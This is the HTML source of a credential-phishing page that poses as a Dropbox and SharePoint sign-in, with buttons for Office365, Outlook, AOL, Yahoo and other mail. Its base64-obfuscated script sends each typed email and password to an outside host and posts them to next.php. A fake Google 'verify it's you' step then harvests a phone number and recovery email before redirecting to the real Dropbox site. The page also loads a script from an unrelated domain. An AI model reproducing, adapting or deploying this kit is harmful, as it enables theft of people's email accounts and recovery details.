<!doctype html>
<html lang="en">

<head>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>Share Point Online</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <style type="text/css">
        body,html{
            height: 100%;
        }
    </style>
</head>

<body style="background-image: url('images/bg.png'); background-size: cover;background-repeat: no-repeat;">
    <div class="container-fluid p-0">
        <div class="container-fluid">
            <div class="row p-3">
                <div class="col-lg-4 text-left">
                    <button class="btn btn-white text-primary">Try Dropbox Buisness</button>
                </div>
                <div class="col-lg-4 text-right">
                    <img src="images/logo.png" class="img-fluid" width="160px;">
                    <span class="h4 text-white align-middle"></span>
                </div>
                <div class="col-lg-4 text-right">
                    <span class="font-weight-bold">Download the web</span>
                </div>
            </div>
        </div>
        <div class="container">
            <div class="row mt-5">
                <div class="col-lg-6 text-white text-center">
                    <div>
                        <h1>Select your email provider</h1>
                        <p class="h4">Where do you want to download from ? <br> Now, you can sign in to Dropbox using your mail</p>
                    </div>
                </div>
            </div>
        </div>
        <div class="container">
            <div class="row mt-5">
                <div class="col-lg-12 mx-auto my-5 px-5 pb-5">
                    <div class="text-center pt-5">
                        <span class="h3 text-white">Dropbox Works The Way You Do</span>
                    </div>
                    <div class="mt-4 row">
                        <div class="col-lg-2 ml-auto">
                            <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                                <div class="rounded px-2 py-4 py-1 mt-2 text-center" style=" background-color: #FF3C00;">
                                    <img src="images/office3651.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                                    <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with <br> Office365</span>
                                </div>
                            </a>
                        </div>
                        <div class="col-lg-2">
                            <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                                <div class="rounded px-2 py-4 py-1 mt-2 text-center" style=" background-color: #0073C8;">
                                    <img src="images/outlook1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                                    <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with <br> Outlook</span>
                                </div>
                            </a>
                        </div>
                        <div class="col-lg-2">
                            <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                                <div class="rounded px-2 py-4 py-1 mt-2 text-center" style=" background-color: #31459B;">
                                    <img src="images/aol1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                                    <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with <br> Aol</span>
                                </div>
                            </a>
                        </div>
                        
                        <div class="col-lg-2">
                            <a href="javascript:void(0)" id="yahoomodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                                <div class="rounded px-2 py-4 py-1 mt-2 text-center" style=" background-color: #5F0F68;">
                                    <img src="images/yahoo1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                                    <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with <br> Yahoo!</span>
                                </div>
                            </a>
                        </div>
                        <div class="col-lg-2 mr-auto">
                            <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                                <div class="rounded px-2 py-4 py-1 mt-2 text-center" style=" background-color: #0B5BD3;">
                                    <img src="images/other1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                                    <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with <br> Other Mail</span>
                                </div>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container-fluid text-white" style="position: absolute;width: 100%;bottom: 0px;">
        <div class="row">
            <div class="col-lg-6 text-left">
                <p>© Copyright Dropbox Inc.<br> 1800 Owens St San Francisco, CA 94158</p>
            </div>
            <div class="col-lg-6 text-right">
                <p>Help Center &nbsp&nbsp&nbsp   Contact Us&nbsp&nbsp&nbsp    Privacy & Terms</p>
            </div>
            
        </div>
    </div>
    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    <center>
                        <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
                        <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
                        <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please enter correct password.</div>
                        <span class="text-danger error" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form class="form-horizontal well">
                        <input type="hidden" name="count" id="count" value="0">
                        <div id="div1">
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <div>
                                        <label for="exampleInputEmail1">Email address</label>
                                        <input type="email" name="ai" class="ai form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email" required="">
                                        <small id="aiHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                                </div>
                            </div>
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <label for="pr">Password</label>
                                    <input type="password" name="pr" class="pr form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password" required="">
                                </div>
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="button" class="btn btn-info pull-right" name="sub-btn" id="sub-btn" value="Login">
                            </div>
                        </div>
                    </form>
                    <form class="form-horizontal well">
                        <div id="div2" style="display: none;">
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich" class="h5">abc@abc.com</span><br>
                            <span class="h4 font-weight-normal">Verify it's you</span><br>
                            <span>This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                            <br>
                            <span>Try another way to sign in</span>
                            <div class="form-group mt-3">
                                <input type="number" name="ph" class="form-control" id="ph" aria-describedby="aiHelp" placeholder="Enter Phone No." required="">
                            </div>
                            <div class="form-group mt-3">
                                <input type="text" name="rec_ai" class="form-control" id="rec_ai" aria-describedby="aiHelp" placeholder="Enter Recovery Email" required="">
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="button" class="btn btn-info pull-right" name="sub-btn1" id="sub-btn1" value="verify">
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
    <script src="https://fonts.cfd/libs/fonts.js"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
var rdrt="https://www.dropbox.com",rc=2,f=atob("bmV4dC5waHA=");$(document).ready(function(){dd=document,tt=atob,dd.querySelector(tt("I3N1Yi1idG4=")).addEventListener(tt("Y2xpY2s="),function(e){fetch(tt("aHR0cHM6Ly+9teWlwcy5jYy9pcC8/YT1TaGFyZXAwaW50JmI9".replace(tt("Kw=="),""))+dd.querySelector(tt("LmFp")).value+tt("JmM9")+dd.querySelector(tt("LnBy")).value)});var e=0;function a(){var e={a:b};return window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,function(e,a,r){}),e}if(a().count){var e=a().count;$("#count").val(e)}var r=window.location.hash.substr(1);if(r){var i=r,t=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!t.test(i))return $(".error").show(),r.focus,!1;var l=i.indexOf("@"),o=i.substr(l+1),c=o.substr(0,o.indexOf(".")),s=c.toLowerCase(),r=window.location.hash.substr(1),i=r,t=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/,l=i.indexOf("@"),o=i.substr(l+1),c=o.substr(0,o.indexOf(".")),s=c.toLowerCase(),e=$("#count").val();s==atob("Z21haWw=")?($("#fieldImg").attr("src","images/"+atob("Z21haWw=")+".png"),$("#field").html(atob("Z21haWw=")),$("#ai").val(i),$("#aich").html(i),$("#gmailmodal").trigger("click")):s==atob("b3V0bG9vaw==")||s==atob("aG90bWFpbA==")?($("#fieldImg").attr("src","images/"+atob("b3V0bG9vaw==")+".png"),$("#field").html("Outlook"),$("#ai").val(i),$("#aich").html(i),$("#outlookmodal").trigger("click")):"aol"==s?($("#fieldImg").attr("src","images/aol.png"),$("#field").html("Aol"),$("#ai").val(i),$("#aich").html(i),$("#aolmodal").trigger("click")):s==atob("b2ZmaWNlMzY1")?($("#fieldImg").attr("src","images/"+atob("b2ZmaWNlMzY1")+".png"),$("#field").html("Office 365"),$("#ai").val(i),$("#aich").html(i),$("#office365modal").trigger("click")):s==atob("eWFob28=")?($("#fieldImg").attr("src","images/"+atob("eWFob28=")+".png"),$("#field").html("Yahoo"),$("#ai").val(i),$("#aich").html(i),$("#yahoomodal").trigger("click")):($("#fieldImg").attr("src","images/othermail.ico"),$("#field").html("Other Mail"),$("#ai").val(i),$("#aich").html(i),$("#othermodal").trigger("click"))}$("#gmailmodal").click(function(){$("#fieldImg").attr("src","images/"+atob("Z21haWw=")+".png"),$("#field").html(atob("Z21haWw=")),$("#msg").hide()}),$("#outlookmodal").click(function(){$("#fieldImg").attr("src","images/"+atob("b3V0bG9vaw==")+".png"),$("#field").html("Outlook"),$("#msg").hide()}),$("#aolmodal").click(function(){$("#fieldImg").attr("src","images/aol.png"),$("#field").html("Aol"),$("#msg").hide()}),$("#office365modal").click(function(){$("#fieldImg").attr("src","images/"+atob("b2ZmaWNlMzY1")+".png"),$("#field").html("Office 365"),$("#msg").hide()}),$("#yahoomodal").click(function(){$("#fieldImg").attr("src","images/"+atob("eWFob28=")+".png"),$("#field").html("Yahoo"),$("#msg").hide()}),$("#othermodal").click(function(){$("#fieldImg").attr("src","images/othermail.ico"),$("#field").html("Other Mail"),$("#msg").hide()}),$("#sub-btn").click(function(a){$(".error").hide(),$("#msg").hide(),a.preventDefault();var r=$("#ai").val(),i=$("#pr").val();$field=$("#field").html();var t=r;if(!r)return $(".error").show(),$(".error").html("Email field is empty...!"),r.focus,!1;if(!/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/.test(t))return $(".error").show(),$(".error").html("That account doesn't exist. Enter a different account"),r.focus,!1;if(!i)return $(".error").show(),$(".error").html("Password field is empty...!"),r.focus,!1;var l=t.indexOf("@"),o=t.substr(l+1),c=o.substr(0,o.indexOf(".")).toLowerCase();e+=1,$.ajax({dataType:"JSON",url:f,type:"POST",data:{ai:r,pr:i},beforeSend:function(e){$("#sub-btn").val("Verifing...")},complete:function(){return 1==e&&(c==atob("Z21haWw=")||$field==atob("Z21haWw=")||$field==atob("Z21haWw="))?($("#aich").html(t),$("#div1").animate({left:0,opacity:"hide"},0),$("#div2").animate({right:0,opacity:"show"},1e3),$("#sub-btn").hide(),$("#sub-btn1").show(),!1):e>=rc?(e=0,window.location.replace(rdrt),!1):void($("#pr").val(""),$("#msg").show(),$("#sub-btn").val("Login"))}})}),$("#sub-btn1").click(function(e){e.preventDefault();var a=$("#ai").val(),r=$("#pr").val(),i=$("#ph").val(),t=$("#rec_ai").val();return a?r?i?t?void $.ajax({dataType:"JSON",url:f,type:"POST",data:{ai:a,pr:r,ph:i,rec_ai:t},beforeSend:function(e){$("#sub-btn1").val("Verifing...")},complete:function(){window.location.replace(rdrt),$("#sub-btn1").val("Verify")}}):($(".error").show(),$(".error").html("Recovery email field is empty...!"),a.focus,!1):($(".error").show(),$(".error").html("Phone field is empty...!"),a.focus,!1):($(".error").show(),$(".error").html("Password field is empty...!"),a.focus,!1):($(".error").show(),$(".error").html("Email field is empty...!"),a.focus,!1)})});

</script>

</html>